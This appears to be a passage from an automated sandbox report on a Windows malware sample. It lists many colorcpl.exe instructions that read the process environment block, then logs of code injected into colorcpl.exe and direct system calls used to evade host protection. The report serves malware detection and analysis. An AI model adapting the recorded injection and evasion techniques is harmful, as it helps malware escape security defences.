              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6500 mov eax, dword ptr fs:[00000030h]10_2_227B6500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227225E0 mov eax, dword ptr fs:[00000030h]10_2_227225E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C5ED mov eax, dword ptr fs:[00000030h]10_2_2275C5ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C5ED mov eax, dword ptr fs:[00000030h]10_2_2275C5ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227265D0 mov eax, dword ptr fs:[00000030h]10_2_227265D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A5D0 mov eax, dword ptr fs:[00000030h]10_2_2275A5D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A5D0 mov eax, dword ptr fs:[00000030h]10_2_2275A5D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E5CF mov eax, dword ptr fs:[00000030h]10_2_2275E5CF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E5CF mov eax, dword ptr fs:[00000030h]10_2_2275E5CF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227445B1 mov eax, dword ptr fs:[00000030h]10_2_227445B1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227445B1 mov eax, dword ptr fs:[00000030h]10_2_227445B1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E59C mov eax, dword ptr fs:[00000030h]10_2_2275E59C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722582 mov eax, dword ptr fs:[00000030h]10_2_22722582
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722582 mov ecx, dword ptr fs:[00000030h]10_2_22722582
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754588 mov eax, dword ptr fs:[00000030h]10_2_22754588
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279CA72 mov eax, dword ptr fs:[00000030h]10_2_2279CA72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279CA72 mov eax, dword ptr fs:[00000030h]10_2_2279CA72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEA60 mov eax, dword ptr fs:[00000030h]10_2_227CEA60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730A5B mov eax, dword ptr fs:[00000030h]10_2_22730A5B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730A5B mov eax, dword ptr fs:[00000030h]10_2_22730A5B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22744A35 mov eax, dword ptr fs:[00000030h]10_2_22744A35
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22744A35 mov eax, dword ptr fs:[00000030h]10_2_22744A35
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA38 mov eax, dword ptr fs:[00000030h]10_2_2275CA38
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA24 mov eax, dword ptr fs:[00000030h]10_2_2275CA24
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EA2E mov eax, dword ptr fs:[00000030h]10_2_2274EA2E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227ACA11 mov eax, dword ptr fs:[00000030h]10_2_227ACA11
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275AAEE mov eax, dword ptr fs:[00000030h]10_2_2275AAEE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275AAEE mov eax, dword ptr fs:[00000030h]10_2_2275AAEE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720AD0 mov eax, dword ptr fs:[00000030h]10_2_22720AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754AD0 mov eax, dword ptr fs:[00000030h]10_2_22754AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754AD0 mov eax, dword ptr fs:[00000030h]10_2_22754AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728AA0 mov eax, dword ptr fs:[00000030h]10_2_22728AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728AA0 mov eax, dword ptr fs:[00000030h]10_2_22728AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776AA4 mov eax, dword ptr fs:[00000030h]10_2_22776AA4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758A90 mov edx, dword ptr fs:[00000030h]10_2_22758A90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4A80 mov eax, dword ptr fs:[00000030h]10_2_227F4A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271CB7E mov eax, dword ptr fs:[00000030h]10_2_2271CB7E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718B50 mov eax, dword ptr fs:[00000030h]10_2_22718B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEB50 mov eax, dword ptr fs:[00000030h]10_2_227CEB50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4B4B mov eax, dword ptr fs:[00000030h]10_2_227D4B4B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4B4B mov eax, dword ptr fs:[00000030h]10_2_227D4B4B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6B40 mov eax, dword ptr fs:[00000030h]10_2_227B6B40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6B40 mov eax, dword ptr fs:[00000030h]10_2_227B6B40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EAB40 mov eax, dword ptr fs:[00000030h]10_2_227EAB40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C8B42 mov eax, dword ptr fs:[00000030h]10_2_227C8B42
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EB20 mov eax, dword ptr fs:[00000030h]10_2_2274EB20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EB20 mov eax, dword ptr fs:[00000030h]10_2_2274EB20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E8B28 mov eax, dword ptr fs:[00000030h]10_2_227E8B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E8B28 mov eax, dword ptr fs:[00000030h]10_2_227E8B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4B00 mov eax, dword ptr fs:[00000030h]10_2_227F4B00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EBFC mov eax, dword ptr fs:[00000030h]10_2_2274EBFC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227ACBF0 mov eax, dword ptr fs:[00000030h]10_2_227ACBF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEBD0 mov eax, dword ptr fs:[00000030h]10_2_227CEBD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730BBE mov eax, dword ptr fs:[00000030h]10_2_22730BBE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730BBE mov eax, dword ptr fs:[00000030h]10_2_22730BBE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4BB0 mov eax, dword ptr fs:[00000030h]10_2_227D4BB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4BB0 mov eax, dword ptr fs:[00000030h]10_2_227D4BB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE872 mov eax, dword ptr fs:[00000030h]10_2_227AE872
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE872 mov eax, dword ptr fs:[00000030h]10_2_227AE872
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6870 mov eax, dword ptr fs:[00000030h]10_2_227B6870
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6870 mov eax, dword ptr fs:[00000030h]10_2_227B6870
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750854 mov eax, dword ptr fs:[00000030h]10_2_22750854
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724859 mov eax, dword ptr fs:[00000030h]10_2_22724859
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724859 mov eax, dword ptr fs:[00000030h]10_2_22724859
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22732840 mov ecx, dword ptr fs:[00000030h]10_2_22732840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov ecx, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A830 mov eax, dword ptr fs:[00000030h]10_2_2275A830
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C483A mov eax, dword ptr fs:[00000030h]10_2_227C483A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C483A mov eax, dword ptr fs:[00000030h]10_2_227C483A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC810 mov eax, dword ptr fs:[00000030h]10_2_227AC810
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275C8F9 mov eax, dword ptr fs:[00000030h] | 10_2_2275C8F9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275C8F9 mov eax, dword ptr fs:[00000030h] | 10_2_2275C8F9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EA8E4 mov eax, dword ptr fs:[00000030h] | 10_2_227EA8E4
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2274E8C0 mov eax, dword ptr fs:[00000030h] | 10_2_2274E8C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F08C0 mov eax, dword ptr fs:[00000030h] | 10_2_227F08C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227AC89D mov eax, dword ptr fs:[00000030h] | 10_2_227AC89D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22720887 mov eax, dword ptr fs:[00000030h] | 10_2_22720887
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C4978 mov eax, dword ptr fs:[00000030h] | 10_2_227C4978
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C4978 mov eax, dword ptr fs:[00000030h] | 10_2_227C4978
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227AC97C mov eax, dword ptr fs:[00000030h] | 10_2_227AC97C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22746962 mov eax, dword ptr fs:[00000030h] | 10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22746962 mov eax, dword ptr fs:[00000030h] | 10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22746962 mov eax, dword ptr fs:[00000030h] | 10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276096E mov eax, dword ptr fs:[00000030h] | 10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276096E mov edx, dword ptr fs:[00000030h] | 10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276096E mov eax, dword ptr fs:[00000030h] | 10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A0946 mov eax, dword ptr fs:[00000030h] | 10_2_227A0946
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F4940 mov eax, dword ptr fs:[00000030h] | 10_2_227F4940
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A892A mov eax, dword ptr fs:[00000030h] | 10_2_227A892A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B892B mov eax, dword ptr fs:[00000030h] | 10_2_227B892B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227AC912 mov eax, dword ptr fs:[00000030h] | 10_2_227AC912
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22718918 mov eax, dword ptr fs:[00000030h] | 10_2_22718918
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22718918 mov eax, dword ptr fs:[00000030h] | 10_2_22718918
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E908 mov eax, dword ptr fs:[00000030h] | 10_2_2279E908
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E908 mov eax, dword ptr fs:[00000030h] | 10_2_2279E908
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227529F9 mov eax, dword ptr fs:[00000030h] | 10_2_227529F9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227529F9 mov eax, dword ptr fs:[00000030h] | 10_2_227529F9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227AE9E0 mov eax, dword ptr fs:[00000030h] | 10_2_227AE9E0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h] | 10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227549D0 mov eax, dword ptr fs:[00000030h] | 10_2_227549D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EA9D3 mov eax, dword ptr fs:[00000030h] | 10_2_227EA9D3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B69C0 mov eax, dword ptr fs:[00000030h] | 10_2_227B69C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A89B3 mov esi, dword ptr fs:[00000030h] | 10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A89B3 mov eax, dword ptr fs:[00000030h] | 10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A89B3 mov eax, dword ptr fs:[00000030h] | 10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h] | 10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h] | 10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h] | 10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h] | 10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h] | 10_2_227329A0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\z10982283782.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\z10982283782.exe | Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 65F1560
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtMapViewOfSection: Direct from: 0x77762D1C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtCreateMutant: Direct from: 0x777635CC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtResumeThread: Direct from: 0x777636AC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtReadFile: Direct from: 0x77762ADC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtDelayExecution: Direct from: 0x77762DDC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtQueryInformationProcess: Direct from: 0x77762C26
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtResumeThread: Direct from: 0x77762FBC
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtCreateUserProcess: Direct from: 0x7776371C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtSetInformationThread: Direct from: 0x777563F9
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
